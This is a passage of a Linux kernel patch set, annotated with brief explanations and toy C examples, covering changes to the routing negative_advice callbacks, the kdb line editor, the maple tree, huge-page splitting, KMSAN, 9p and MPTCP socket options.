+ #ifdef CONFIG_UP_LATE_INIT
+ extern void __init up_late_init(void);
+ static inline void smp_init(void) { up_late_init(); }
+diff --git a/include/net/dst_ops.h b/include/net/dst_ops.h
+index 632086b2f644a..3ae2fda295073 100644
+--- a/include/net/dst_ops.h
++++ b/include/net/dst_ops.h
+@@ -24,7 +24,7 @@ struct dst_ops {
+ 	void			(*destroy)(struct dst_entry *);
+ 	void			(*ifdown)(struct dst_entry *,
+ 					  struct net_device *dev, int how);
+-	struct dst_entry *	(*negative_advice)(struct dst_entry *);
++	void			(*negative_advice)(struct sock *sk, struct dst_entry *);
+ 	void			(*link_failure)(struct sk_buff *);
+ 	void			(*update_pmtu)(struct dst_entry *dst, struct sock *sk,
+ 					       struct sk_buff *skb, u32 mtu,
+diff --git a/include/net/sock.h b/include/net/sock.h
+index 77298c74822a6..9dab482078743 100644
+--- a/include/net/sock.h
++++ b/include/net/sock.h
+@@ -2212,17 +2212,10 @@ sk_dst_get(struct sock *sk)
+ 
+ static inline void __dst_negative_advice(struct sock *sk)
+ {
+-	struct dst_entry *ndst, *dst = __sk_dst_get(sk);
++	struct dst_entry *dst = __sk_dst_get(sk);
+ 
+-	if (dst && dst->ops->negative_advice) {
+-		ndst = dst->ops->negative_advice(dst);
+-
+-		if (ndst != dst) {
+-			rcu_assign_pointer(sk->sk_dst_cache, ndst);
+-			sk_tx_queue_clear(sk);
+-			WRITE_ONCE(sk->sk_dst_pending_confirm, 0);
+-		}
+-	}
++	if (dst && dst->ops->negative_advice)
++		dst->ops->negative_advice(sk, dst);
+ }
+ 
+ static inline void dst_negative_advice(struct sock *sk)
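
The contract change above moves the cache-dropping into the callback: instead of returning a replacement dst (possibly NULL) for the caller to install, each ->negative_advice() now decides for itself and calls sk_dst_reset(). A toy userspace mock of the new shape, with all types collapsed to minimal structs:

#include <stdio.h>

struct dst { int obsolete; };
struct sock { struct dst *dst_cache; };

static void sk_dst_reset(struct sock *sk) { sk->dst_cache = NULL; }

static void negative_advice(struct sock *sk, struct dst *dst)
{
	if (dst->obsolete > 0)		/* stale route: drop the cache */
		sk_dst_reset(sk);
	/* otherwise keep the cached dst untouched */
}

int main(void)
{
	struct dst d = { .obsolete = 2 };
	struct sock s = { .dst_cache = &d };

	negative_advice(&s, s.dst_cache);
	printf("cache %s\n", s.dst_cache ? "kept" : "dropped");
	return 0;
}
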
+diff --git a/include/soc/qcom/cmd-db.h b/include/soc/qcom/cmd-db.h
+index c8bb56e6852a8..47a6cab75e630 100644
+--- a/include/soc/qcom/cmd-db.h
++++ b/include/soc/qcom/cmd-db.h
+@@ -1,5 +1,8 @@
+ /* SPDX-License-Identifier: GPL-2.0 */
+-/* Copyright (c) 2016-2018, The Linux Foundation. All rights reserved. */
++/*
++ * Copyright (c) 2016-2018, The Linux Foundation. All rights reserved.
++ * Copyright (c) 2024, Qualcomm Innovation Center, Inc. All rights reserved.
++ */
+ 
+ #ifndef __QCOM_COMMAND_DB_H__
+ #define __QCOM_COMMAND_DB_H__
+@@ -21,6 +24,8 @@ u32 cmd_db_read_addr(const char *resource_id);
+ 
+ const void *cmd_db_read_aux_data(const char *resource_id, size_t *len);
+ 
++bool cmd_db_match_resource_addr(u32 addr1, u32 addr2);
++
+ enum cmd_db_hw_type cmd_db_read_slave_id(const char *resource_id);
+ 
+ int cmd_db_ready(void);
+@@ -31,6 +36,9 @@ static inline u32 cmd_db_read_addr(const char *resource_id)
+ static inline const void *cmd_db_read_aux_data(const char *resource_id, size_t *len)
+ { return ERR_PTR(-ENODEV); }
+ 
++static inline bool cmd_db_match_resource_addr(u32 addr1, u32 addr2)
++{ return false; }
++
+ static inline enum cmd_db_hw_type cmd_db_read_slave_id(const char *resource_id)
+ { return -ENODEV; }
+ 
+diff --git a/init/main.c b/init/main.c
+index 2c339793511b5..e46aa00b3c997 100644
+--- a/init/main.c
++++ b/init/main.c
+@@ -607,7 +607,6 @@ static int __init rdinit_setup(char *str)
+ __setup("rdinit=", rdinit_setup);
+ 
+ #ifndef CONFIG_SMP
+-static const unsigned int setup_max_cpus = NR_CPUS;
+ static inline void setup_nr_cpu_ids(void) { }
+ static inline void smp_prepare_cpus(unsigned int maxcpus) { }
+ #endif
+diff --git a/kernel/debug/kdb/kdb_io.c b/kernel/debug/kdb/kdb_io.c
+index 67d3c48a15222..b1f79d5a5a60e 100644
+--- a/kernel/debug/kdb/kdb_io.c
++++ b/kernel/debug/kdb/kdb_io.c
+@@ -171,6 +171,33 @@ char kdb_getchar(void)
+ 	unreachable();
+ }
+ 
++/**
++ * kdb_position_cursor() - Place cursor in the correct horizontal position
++ * @prompt: Nil-terminated string containing the prompt string
++ * @buffer: Nil-terminated string containing the entire command line
++ * @cp: Cursor position, pointer to the character in buffer where the cursor
++ *      should be positioned.
++ *
++ * The cursor is positioned by sending a carriage-return and then printing
++ * the content of the line until we reach the correct cursor position.
++ *
++ * There is some additional fine detail here.
++ *
++ * Firstly, even though kdb_printf() will correctly format zero-width fields,
++ * we want the second call to kdb_printf() to be conditional. That keeps things
++ * a little cleaner when LOGGING=1.
++ *
++ * Secondly, we can't combine everything into one call to kdb_printf() since
++ * that renders into a fixed length buffer and the combined print could result
++ * in unwanted truncation.
++ */
++static void kdb_position_cursor(char *prompt, char *buffer, char *cp)
++{
++	kdb_printf("\r%s", prompt);
++	if (cp > buffer)
++		kdb_printf("%.*s", (int)(cp - buffer), buffer);
++}
++
+ /*
+  * kdb_read
+  *
+@@ -199,7 +226,6 @@ static char *kdb_read(char *buffer, size_t bufsize)
+ 						 * and null byte */
+ 	char *lastchar;
+ 	char *p_tmp;
+-	char tmp;
+ 	static char tmpbuffer[CMD_BUFLEN];
+ 	int len = strlen(buffer);
+ 	int len_tmp;
+@@ -236,12 +262,8 @@ static char *kdb_read(char *buffer, size_t bufsize)
+ 			}
+ 			*(--lastchar) = '\0';
+ 			--cp;
+-			kdb_printf("\b%s \r", cp);
+-			tmp = *cp;
+-			*cp = '\0';
+-			kdb_printf(kdb_prompt_str);
+-			kdb_printf("%s", buffer);
+-			*cp = tmp;
++			kdb_printf("\b%s ", cp);
++			kdb_position_cursor(kdb_prompt_str, buffer, cp);
+ 		}
+ 		break;
+ 	case 13: /* enter */
+@@ -258,19 +280,14 @@ static char *kdb_read(char *buffer, size_t bufsize)
+ 			memcpy(tmpbuffer, cp+1, lastchar - cp - 1);
+ 			memcpy(cp, tmpbuffer, lastchar - cp - 1);
+ 			*(--lastchar) = '\0';
+-			kdb_printf("%s \r", cp);
+-			tmp = *cp;
+-			*cp = '\0';
+-			kdb_printf(kdb_prompt_str);
+-			kdb_printf("%s", buffer);
+-			*cp = tmp;
++			kdb_printf("%s ", cp);
++			kdb_position_cursor(kdb_prompt_str, buffer, cp);
+ 		}
+ 		break;
+ 	case 1: /* Home */
+ 		if (cp > buffer) {
+-			kdb_printf("\r");
+-			kdb_printf(kdb_prompt_str);
+ 			cp = buffer;
++			kdb_position_cursor(kdb_prompt_str, buffer, cp);
+ 		}
+ 		break;
+ 	case 5: /* End */
+@@ -286,11 +303,10 @@ static char *kdb_read(char *buffer, size_t bufsize)
+ 		}
+ 		break;
+ 	case 14: /* Down */
+-		memset(tmpbuffer, ' ',
+-		       strlen(kdb_prompt_str) + (lastchar-buffer));
+-		*(tmpbuffer+strlen(kdb_prompt_str) +
+-		  (lastchar-buffer)) = '\0';
+-		kdb_printf("\r%s\r", tmpbuffer);
++	case 16: /* Up */
++		kdb_printf("\r%*c\r",
++			   (int)(strlen(kdb_prompt_str) + (lastchar - buffer)),
++			   ' ');
+ 		*lastchar = (char)key;
+ 		*(lastchar+1) = '\0';
+ 		return lastchar;
+@@ -300,15 +316,6 @@ static char *kdb_read(char *buffer, size_t bufsize)
+ 			++cp;
+ 		}
+ 		break;
+-	case 16: /* Up */
+-		memset(tmpbuffer, ' ',
+-		       strlen(kdb_prompt_str) + (lastchar-buffer));
+-		*(tmpbuffer+strlen(kdb_prompt_str) +
+-		  (lastchar-buffer)) = '\0';
+-		kdb_printf("\r%s\r", tmpbuffer);
+-		*lastchar = (char)key;
+-		*(lastchar+1) = '\0';
+-		return lastchar;
+ 	case 9: /* Tab */
+ 		if (tab < 2)
+ 			++tab;
+@@ -352,15 +359,25 @@ static char *kdb_read(char *buffer, size_t bufsize)
+ 			kdb_printf("\n");
+ 			kdb_printf(kdb_prompt_str);
+ 			kdb_printf("%s", buffer);
++			if (cp != lastchar)
++				kdb_position_cursor(kdb_prompt_str, buffer, cp);
+ 		} else if (tab != 2 && count > 0) {
+-			len_tmp = strlen(p_tmp);
+-			strncpy(p_tmp+len_tmp, cp, lastchar-cp+1);
+-			len_tmp = strlen(p_tmp);
+-			strncpy(cp, p_tmp+len, len_tmp-len + 1);
+-			len = len_tmp - len;
+-			kdb_printf("%s", cp);
+-			cp += len;
+-			lastchar += len;
++			/* How many new characters do we want from tmpbuffer? */
++			len_tmp = strlen(p_tmp) - len;
++			if (lastchar + len_tmp >= bufend)
++				len_tmp = bufend - lastchar;
++
++			if (len_tmp) {
++				/* + 1 ensures the '\0' is memmove'd */
++				memmove(cp+len_tmp, cp, (lastchar-cp) + 1);
++				memcpy(cp, p_tmp+len, len_tmp);
++				kdb_printf("%s", cp);
++				cp += len_tmp;
++				lastchar += len_tmp;
++				if (cp != lastchar)
++					kdb_position_cursor(kdb_prompt_str,
++							    buffer, cp);
++			}
+ 		}
+ 		kdb_nextline = 1; /* reset output line number */
+ 		break;
+@@ -371,13 +388,9 @@ static char *kdb_read(char *buffer, size_t bufsize)
+ 				memcpy(cp+1, tmpbuffer, lastchar - cp);
+ 				*++lastchar = '\0';
+ 				*cp = key;
+-				kdb_printf("%s\r", cp);
++				kdb_printf("%s", cp);
+ 				++cp;
+-				tmp = *cp;
+-				*cp = '\0';
+-				kdb_printf(kdb_prompt_str);
+-				kdb_printf("%s", buffer);
+-				*cp = tmp;
++				kdb_position_cursor(kdb_prompt_str, buffer, cp);
+ 			} else {
+ 				*++lastchar = '\0';
+ 				*cp++ = key;
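
kdb_position_cursor() relies on a plain terminal trick: carriage-return to column 0, reprint the prompt, then reprint the line only up to the cursor, leaving the hardware cursor in the right column. A userspace sketch of the same trick using stdio:

#include <stdio.h>

static void position_cursor(const char *prompt, const char *buffer,
			    const char *cp)
{
	printf("\r%s", prompt);
	if (cp > buffer)
		printf("%.*s", (int)(cp - buffer), buffer);
	fflush(stdout);
}

int main(void)
{
	const char *buf = "md 0x1000";

	position_cursor("kdb> ", buf, buf + 2);	/* cursor lands after "md" */
	return 0;
}
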
+diff --git a/lib/maple_tree.c b/lib/maple_tree.c
+index 4976522e3e481..9a5bdf1e8e92a 100644
+--- a/lib/maple_tree.c
++++ b/lib/maple_tree.c
+@@ -5277,25 +5277,28 @@ static inline void mas_fill_gap(struct ma_state *mas, void *entry,
+  * @size: The size of the gap
+  * @fwd: Searching forward or back
+  */
+-static inline void mas_sparse_area(struct ma_state *mas, unsigned long min,
++static inline int mas_sparse_area(struct ma_state *mas, unsigned long min,
+ 				unsigned long max, unsigned long size, bool fwd)
+ {
+-	unsigned long start = 0;
+-
+-	if (!unlikely(mas_is_none(mas)))
+-		start++;
++	if (!unlikely(mas_is_none(mas)) && min == 0) {
++		min++;
++		/*
++		 * min has been increased, so recheck whether a gap of the
++		 * requested size still fits.
++		 */
++		if (min > max || max - min + 1 < size)
++			return -EBUSY;
++	}
+ 	/* mas_is_ptr */
+ 
+-	if (start < min)
+-		start = min;
+-
+ 	if (fwd) {
+-		mas->index = start;
+-		mas->last = start + size - 1;
+-		return;
++		mas->index = min;
++		mas->last = min + size - 1;
++	} else {
++		mas->last = max;
++		mas->index = max - size + 1;
+ 	}
+-
+-	mas->index = max;
++	return 0;
+ }
+ 
+ /*
+@@ -5324,10 +5327,8 @@ int mas_empty_area(struct ma_state *mas, unsigned long min,
+ 		return -EBUSY;
+ 
+ 	/* Empty set */
+-	if (mas_is_none(mas) || mas_is_ptr(mas)) {
+-		mas_sparse_area(mas, min, max, size, true);
+-		return 0;
+-	}
++	if (mas_is_none(mas) || mas_is_ptr(mas))
++		return mas_sparse_area(mas, min, max, size, true);
+ 
+ 	/* The start of the window can only be within these values */
+ 	mas->index = min;
+@@ -5367,20 +5368,18 @@ int mas_empty_area_rev(struct ma_state *mas, unsigned long min,
+ 	if (min >= max)
+ 		return -EINVAL;
+ 
+-	if (mas_is_start(mas)) {
++	if (mas_is_start(mas))
+ 		mas_start(mas);
+-		mas->offset = mas_data_end(mas);
+-	} else if (mas->offset >= 2) {
+-		mas->offset -= 2;
+-	} else if (!mas_rewind_node(mas)) {
++	else if ((mas->offset < 2) && (!mas_rewind_node(mas)))
+ 		return -EBUSY;
+-	}
+ 
+-	/* Empty set. */
+-	if (mas_is_none(mas) || mas_is_ptr(mas)) {
+-		mas_sparse_area(mas, min, max, size, false);
+-		return 0;
+-	}
++	if (unlikely(mas_is_none(mas) || mas_is_ptr(mas)))
++		return mas_sparse_area(mas, min, max, size, false);
++	else if (mas->offset >= 2)
++		mas->offset -= 2;
++	else
++		mas->offset = mas_data_end(mas);
++
+ 
+ 	/* The start of the window can only be within these values. */
+ 	mas->index = min;
+diff --git a/mm/cma.c b/mm/cma.c
+index 30b6ca30009bb..01e9d0b2d8757 100644
+--- a/mm/cma.c
++++ b/mm/cma.c
+@@ -186,10 +186,6 @@ int __init cma_init_reserved_mem(phys_addr_t base, phys_addr_t size,
+ 	if (!size || !memblock_is_region_reserved(base, size))
+ 		return -EINVAL;
+ 
+-	/* alignment should be aligned with order_per_bit */
+-	if (!IS_ALIGNED(CMA_MIN_ALIGNMENT_PAGES, 1 << order_per_bit))
+-		return -EINVAL;
+-
+ 	/* ensure minimal alignment required by mm core */
+ 	if (!IS_ALIGNED(base | size, CMA_MIN_ALIGNMENT_BYTES))
+ 		return -EINVAL;
+diff --git a/mm/huge_memory.c b/mm/huge_memory.c
+index 9736e762184bd..1b7f5950d6037 100644
+--- a/mm/huge_memory.c
++++ b/mm/huge_memory.c
+@@ -2108,32 +2108,11 @@ static void __split_huge_pmd_locked(struct vm_area_struct *vma, pmd_t *pmd,
+ 		return __split_huge_zero_page_pmd(vma, haddr, pmd);
+ 	}
+ 
+-	/*
+-	 * Up to this point the pmd is present and huge and userland has the
+-	 * whole access to the hugepage during the split (which happens in
+-	 * place). If we overwrite the pmd with the not-huge version pointing
+-	 * to the pte here (which of course we could if all CPUs were bug
+-	 * free), userland could trigger a small page size TLB miss on the
+-	 * small sized TLB while the hugepage TLB entry is still established in
+-	 * the huge TLB. Some CPU doesn't like that.
+-	 * See http://support.amd.com/TechDocs/41322_10h_Rev_Gd.pdf, Erratum
+-	 * 383 on page 105. Intel should be safe but is also warns that it's
+-	 * only safe if the permission and cache attributes of the two entries
+-	 * loaded in the two TLB is identical (which should be the case here).
+-	 * But it is generally safer to never allow small and huge TLB entries
+-	 * for the same virtual address to be loaded simultaneously. So instead
+-	 * of doing "pmd_populate(); flush_pmd_tlb_range();" we first mark the
+-	 * current pmd notpresent (atomically because here the pmd_trans_huge
+-	 * must remain set at all times on the pmd until the split is complete
+-	 * for this pmd), then we flush the SMP TLB and finally we write the
+-	 * non-huge version of the pmd entry with pmd_populate.
+-	 */
+-	old_pmd = pmdp_invalidate(vma, haddr, pmd);
+-
+-	pmd_migration = is_pmd_migration_entry(old_pmd);
++	pmd_migration = is_pmd_migration_entry(*pmd);
+ 	if (unlikely(pmd_migration)) {
+ 		swp_entry_t entry;
+ 
++		old_pmd = *pmd;
+ 		entry = pmd_to_swp_entry(old_pmd);
+ 		page = pfn_swap_entry_to_page(entry);
+ 		write = is_writable_migration_entry(entry);
+@@ -2144,6 +2123,30 @@ static void __split_huge_pmd_locked(struct vm_area_struct *vma, pmd_t *pmd,
+ 		soft_dirty = pmd_swp_soft_dirty(old_pmd);
+ 		uffd_wp = pmd_swp_uffd_wp(old_pmd);
+ 	} else {
++		/*
++		 * Up to this point the pmd is present and huge and userland has
++		 * the whole access to the hugepage during the split (which
++		 * happens in place). If we overwrite the pmd with the not-huge
++		 * version pointing to the pte here (which of course we could if
++		 * all CPUs were bug free), userland could trigger a small page
++		 * size TLB miss on the small sized TLB while the hugepage TLB
++		 * entry is still established in the huge TLB. Some CPU doesn't
++		 * like that. See
++		 * http://support.amd.com/TechDocs/41322_10h_Rev_Gd.pdf, Erratum
++		 * 383 on page 105. Intel should be safe but also warns that
++		 * it's only safe if the permission and cache attributes of the
++		 * two entries loaded in the two TLBs are identical (which should
++		 * be the case here). But it is generally safer to never allow
++		 * small and huge TLB entries for the same virtual address to be
++		 * loaded simultaneously. So instead of doing "pmd_populate();
++		 * flush_pmd_tlb_range();" we first mark the current pmd
++		 * notpresent (atomically because here the pmd_trans_huge must
++		 * remain set at all times on the pmd until the split is
++		 * complete for this pmd), then we flush the SMP TLB and finally
++		 * we write the non-huge version of the pmd entry with
++		 * pmd_populate.
++		 */
++		old_pmd = pmdp_invalidate(vma, haddr, pmd);
+ 		page = pmd_page(old_pmd);
+ 		if (pmd_dirty(old_pmd)) {
+ 			dirty = true;
+diff --git a/mm/hugetlb.c b/mm/hugetlb.c
+index 4361dcf70139f..87a14638fad09 100644
+--- a/mm/hugetlb.c
++++ b/mm/hugetlb.c
+@@ -7669,9 +7669,9 @@ void __init hugetlb_cma_reserve(int order)
+ 		 * huge page demotion.
+ 		 */
+ 		res = cma_declare_contiguous_nid(0, size, 0,
+-						PAGE_SIZE << HUGETLB_PAGE_ORDER,
+-						 0, false, name,
+-						 &hugetlb_cma[nid], nid);
++					PAGE_SIZE << HUGETLB_PAGE_ORDER,
++					HUGETLB_PAGE_ORDER, false, name,
++					&hugetlb_cma[nid], nid);
+ 		if (res) {
+ 			pr_warn("hugetlb_cma: reservation failed: err %d, node %d",
+ 				res, nid);
+diff --git a/mm/kmsan/core.c b/mm/kmsan/core.c
+index 112dce135c7f6..dff759f32bbb3 100644
+--- a/mm/kmsan/core.c
++++ b/mm/kmsan/core.c
+@@ -258,8 +258,7 @@ void kmsan_internal_set_shadow_origin(void *addr, size_t size, int b,
+ 				      u32 origin, bool checked)
+ {
+ 	u64 address = (u64)addr;
+-	void *shadow_start;
+-	u32 *origin_start;
++	u32 *shadow_start, *origin_start;
+ 	size_t pad = 0;
+ 
+ 	KMSAN_WARN_ON(!kmsan_metadata_is_contiguous(addr, size));
+@@ -287,8 +286,16 @@ void kmsan_internal_set_shadow_origin(void *addr, size_t size, int b,
+ 	origin_start =
+ 		(u32 *)kmsan_get_metadata((void *)address, KMSAN_META_ORIGIN);
+ 
+-	for (int i = 0; i < size / KMSAN_ORIGIN_SIZE; i++)
+-		origin_start[i] = origin;
++	/*
++	 * If the new origin is non-zero, assume that the shadow byte is also non-zero,
++	 * and unconditionally overwrite the old origin slot.
++	 * If the new origin is zero, overwrite the old origin slot iff the
++	 * corresponding shadow slot is zero.
++	 */
++	for (int i = 0; i < size / KMSAN_ORIGIN_SIZE; i++) {
++		if (origin || !shadow_start[i])
++			origin_start[i] = origin;
++	}
+ }
+ 
+ struct page *kmsan_vmalloc_to_page_or_null(void *vaddr)
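
The loop above encodes one rule: a non-zero origin always wins, but a zero origin (meaning "initialized") may only overwrite slots whose shadow is also zero, so bytes that are still poisoned keep their provenance. Restated as a standalone function:

#include <stdint.h>
#include <stddef.h>

static void set_origins(const uint32_t *shadow, uint32_t *origin,
			size_t nslots, uint32_t new_origin)
{
	for (size_t i = 0; i < nslots; i++) {
		/* a zero origin only overwrites fully-initialized slots */
		if (new_origin || !shadow[i])
			origin[i] = new_origin;
	}
}
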
+diff --git a/mm/pgtable-generic.c b/mm/pgtable-generic.c
+index 90ab721a12a82..6a582cc07023f 100644
+--- a/mm/pgtable-generic.c
++++ b/mm/pgtable-generic.c
+@@ -195,6 +195,7 @@ pgtable_t pgtable_trans_huge_withdraw(struct mm_struct *mm, pmd_t *pmdp)
+ pmd_t pmdp_invalidate(struct vm_area_struct *vma, unsigned long address,
+ 		     pmd_t *pmdp)
+ {
++	VM_WARN_ON_ONCE(!pmd_present(*pmdp));
+ 	pmd_t old = pmdp_establish(vma, address, pmdp, pmd_mkinvalid(*pmdp));
+ 	flush_pmd_tlb_range(vma, address, address + HPAGE_PMD_SIZE);
+ 	return old;
+@@ -205,6 +206,7 @@ pmd_t pmdp_invalidate(struct vm_area_struct *vma, unsigned long address,
+ pmd_t pmdp_invalidate_ad(struct vm_area_struct *vma, unsigned long address,
+ 			 pmd_t *pmdp)
+ {
++	VM_WARN_ON_ONCE(!pmd_present(*pmdp));
+ 	return pmdp_invalidate(vma, address, pmdp);
+ }
+ #endif
+diff --git a/net/9p/client.c b/net/9p/client.c
+index 1d9a8a1f3f107..0fc2d706d9c23 100644
+--- a/net/9p/client.c
++++ b/net/9p/client.c
+@@ -231,6 +231,8 @@ static int p9_fcall_init(struct p9_client *c, struct p9_fcall *fc,
+ 	if (!fc->sdata)
+ 		return -ENOMEM;
+ 	fc->capacity = alloc_msize;
++	fc->id = 0;
++	fc->tag = P9_NOTAG;
+ 	return 0;
+ }
+ 
+diff --git a/net/ipv4/route.c b/net/ipv4/route.c
+index 6c0f1e347b855..fcbacd39febe0 100644
+--- a/net/ipv4/route.c
++++ b/net/ipv4/route.c
+@@ -132,7 +132,8 @@ struct dst_entry	*ipv4_dst_check(struct dst_entry *dst, u32 cookie);
+ static unsigned int	 ipv4_default_advmss(const struct dst_entry *dst);
+ INDIRECT_CALLABLE_SCOPE
+ unsigned int		ipv4_mtu(const struct dst_entry *dst);
+-static struct dst_entry *ipv4_negative_advice(struct dst_entry *dst);
++static void		ipv4_negative_advice(struct sock *sk,
++					     struct dst_entry *dst);
+ static void		 ipv4_link_failure(struct sk_buff *skb);
+ static void		 ip_rt_update_pmtu(struct dst_entry *dst, struct sock *sk,
+ 					   struct sk_buff *skb, u32 mtu,
+@@ -837,22 +838,15 @@ static void ip_do_redirect(struct dst_entry *dst, struct sock *sk, struct sk_buf
+ 	__ip_do_redirect(rt, skb, &fl4, true);
+ }
+ 
+-static struct dst_entry *ipv4_negative_advice(struct dst_entry *dst)
++static void ipv4_negative_advice(struct sock *sk,
++				 struct dst_entry *dst)
+ {
+ 	struct rtable *rt = (struct rtable *)dst;
+-	struct dst_entry *ret = dst;
+ 
+-	if (rt) {
+-		if (dst->obsolete > 0) {
+-			ip_rt_put(rt);
+-			ret = NULL;
+-		} else if ((rt->rt_flags & RTCF_REDIRECTED) ||
+-			   rt->dst.expires) {
+-			ip_rt_put(rt);
+-			ret = NULL;
+-		}
+-	}
+-	return ret;
++	if ((dst->obsolete > 0) ||
++	    (rt->rt_flags & RTCF_REDIRECTED) ||
++	    rt->dst.expires)
++		sk_dst_reset(sk);
+ }
+ 
+ /*
+diff --git a/net/ipv6/route.c b/net/ipv6/route.c
+index 887599d351b8d..258e87055836f 100644
+--- a/net/ipv6/route.c
++++ b/net/ipv6/route.c
+@@ -87,7 +87,8 @@ struct dst_entry	*ip6_dst_check(struct dst_entry *dst, u32 cookie);
+ static unsigned int	 ip6_default_advmss(const struct dst_entry *dst);
+ INDIRECT_CALLABLE_SCOPE
+ unsigned int		ip6_mtu(const struct dst_entry *dst);
+-static struct dst_entry *ip6_negative_advice(struct dst_entry *);
++static void		ip6_negative_advice(struct sock *sk,
++					    struct dst_entry *dst);
+ static void		ip6_dst_destroy(struct dst_entry *);
+ static void		ip6_dst_ifdown(struct dst_entry *,
+ 				       struct net_device *dev, int how);
+@@ -2762,24 +2763,24 @@ INDIRECT_CALLABLE_SCOPE struct dst_entry *ip6_dst_check(struct dst_entry *dst,
+ }
+ EXPORT_INDIRECT_CALLABLE(ip6_dst_check);
+ 
+-static struct dst_entry *ip6_negative_advice(struct dst_entry *dst)
++static void ip6_negative_advice(struct sock *sk,
++				struct dst_entry *dst)
+ {
+ 	struct rt6_info *rt = (struct rt6_info *) dst;
+ 
+-	if (rt) {
+-		if (rt->rt6i_flags & RTF_CACHE) {
+-			rcu_read_lock();
+-			if (rt6_check_expired(rt)) {
+-				rt6_remove_exception_rt(rt);
+-				dst = NULL;
+-			}
+-			rcu_read_unlock();
+-		} else {
+-			dst_release(dst);
+-			dst = NULL;
++	if (rt->rt6i_flags & RTF_CACHE) {
++		rcu_read_lock();
++		if (rt6_check_expired(rt)) {
++			/* counteract the dst_release() in sk_dst_reset() */
++			dst_hold(dst);
++			sk_dst_reset(sk);
++
++			rt6_remove_exception_rt(rt);
+ 		}
++		rcu_read_unlock();
++		return;
+ 	}
+-	return dst;
++	sk_dst_reset(sk);
+ }
+ 
+ static void ip6_link_failure(struct sk_buff *skb)
+@@ -4435,7 +4436,7 @@ static void rtmsg_to_fib6_config(struct net *net,
+ 		.fc_table = l3mdev_fib_table_by_index(net, rtmsg->rtmsg_ifindex) ?
+ 			 : RT6_TABLE_MAIN,
+ 		.fc_ifindex = rtmsg->rtmsg_ifindex,
+-		.fc_metric = rtmsg->rtmsg_metric ? : IP6_RT_PRIO_USER,
++		.fc_metric = rtmsg->rtmsg_metric,
+ 		.fc_expires = rtmsg->rtmsg_info,
+ 		.fc_dst_len = rtmsg->rtmsg_dst_len,
+ 		.fc_src_len = rtmsg->rtmsg_src_len,
+@@ -4465,6 +4466,9 @@ int ipv6_route_ioctl(struct net *net, unsigned int cmd, struct in6_rtmsg *rtmsg)
+ 	rtnl_lock();
+ 	switch (cmd) {
+ 	case SIOCADDRT:
++		/* Only do the default setting of fc_metric in route adding */
++		if (cfg.fc_metric == 0)
++			cfg.fc_metric = IP6_RT_PRIO_USER;
+ 		err = ip6_route_add(&cfg, GFP_KERNEL, NULL);
+ 		break;
+ 	case SIOCDELRT:
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index 2bc37773e7803..eaed858c0ff94 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -288,6 +288,9 @@ struct mptcp_sock {
+ 			fastopening:1,
+ 			in_accept_queue:1,
+ 			free_first:1;
++	int		keepalive_cnt;
++	int		keepalive_idle;
++	int		keepalive_intvl;
+ 	struct work_struct work;
+ 	struct sk_buff  *ooo_last_skb;
+ 	struct rb_root  out_of_order_queue;
+diff --git a/net/mptcp/sockopt.c b/net/mptcp/sockopt.c
+index e59e46e07b5c9..ff82fc062ae76 100644
+--- a/net/mptcp/sockopt.c
++++ b/net/mptcp/sockopt.c
+@@ -616,20 +616,57 @@ static int mptcp_setsockopt_sol_tcp_congestion(struct mptcp_sock *msk, sockptr_t
+ 	return ret;
+ }
+ 
+-static int mptcp_setsockopt_sol_tcp_cork(struct mptcp_sock *msk, sockptr_t optval,
+-					 unsigned int optlen)
++static int __tcp_sock_set_keepintvl(struct sock *sk, int val)
+ {
+-	struct mptcp_subflow_context *subflow;
+-	struct sock *sk = (struct sock *)msk;
+-	int val;
++	if (val < 1 || val > MAX_TCP_KEEPINTVL)
++		return -EINVAL;
+ 
+-	if (optlen < sizeof(int))
++	WRITE_ONCE(tcp_sk(sk)->keepalive_intvl, val * HZ);
++
++	return 0;
++}
++
++static int __tcp_sock_set_keepcnt(struct sock *sk, int val)
++{
++	if (val < 1 || val > MAX_TCP_KEEPCNT)
+ 		return -EINVAL;
+ 
+-	if (copy_from_sockptr(&val, optval, sizeof(val)))
+-		return -EFAULT;
++	/* Paired with READ_ONCE() in keepalive_probes() */
++	WRITE_ONCE(tcp_sk(sk)->keepalive_probes, val);
++
++	return 0;
++}
++
++static int __mptcp_setsockopt_set_val(struct mptcp_sock *msk, int max,
++				      int (*set_val)(struct sock *, int),
++				      int *msk_val, int val)
++{
++	struct mptcp_subflow_context *subflow;
++	int err = 0;
++
++	mptcp_for_each_subflow(msk, subflow) {
++		struct sock *ssk = mptcp_subflow_tcp_sock(subflow);
++		int ret;
++
++		lock_sock(ssk);
++		ret = set_val(ssk, val);
++		err = err ? : ret;
++		release_sock(ssk);
++	}
++
++	if (!err) {
++		*msk_val = val;
++		sockopt_seq_inc(msk);
++	}
++
++	return err;
++}
++
++static int __mptcp_setsockopt_sol_tcp_cork(struct mptcp_sock *msk, int val)
++{
++	struct mptcp_subflow_context *subflow;
++	struct sock *sk = (struct sock *)msk;
+ 
+-	lock_sock(sk);
+ 	sockopt_seq_inc(msk);
+ 	msk->cork = !!val;
+ 	mptcp_for_each_subflow(msk, subflow) {
+@@ -641,25 +678,15 @@ static int mptcp_setsockopt_sol_tcp_cork(struct mptcp_sock *msk, sockptr_t optva
+ 	}
+ 	if (!val)
+ 		mptcp_check_and_set_pending(sk);
+-	release_sock(sk);
+ 
+ 	return 0;
+ }
+ 
+-static int mptcp_setsockopt_sol_tcp_nodelay(struct mptcp_sock *msk, sockptr_t optval,
+-					    unsigned int optlen)
++static int __mptcp_setsockopt_sol_tcp_nodelay(struct mptcp_sock *msk, int val)
+ {
+ 	struct mptcp_subflow_context *subflow;
+ 	struct sock *sk = (struct sock *)msk;
+-	int val;
+-
+-	if (optlen < sizeof(int))
+-		return -EINVAL;
+-
+-	if (copy_from_sockptr(&val, optval, sizeof(val)))
+-		return -EFAULT;
+ 
+-	lock_sock(sk);
+ 	sockopt_seq_inc(msk);
+ 	msk->nodelay = !!val;
+ 	mptcp_for_each_subflow(msk, subflow) {
+@@ -671,8 +698,6 @@ static int mptcp_setsockopt_sol_tcp_nodelay(struct mptcp_sock *msk, sockptr_t op
+ 	}
+ 	if (val)
+ 		mptcp_check_and_set_pending(sk);
+-	release_sock(sk);
+-
+ 	return 0;
+ }
+ 
+@@ -797,25 +822,10 @@ static int mptcp_setsockopt_sol_tcp(struct mptcp_sock *msk, int optname,
+ 	int ret, val;
+ 
+ 	switch (optname) {
+-	case TCP_INQ:
+-		ret = mptcp_get_int_option(msk, optval, optlen, &val);
+-		if (ret)
+-			return ret;
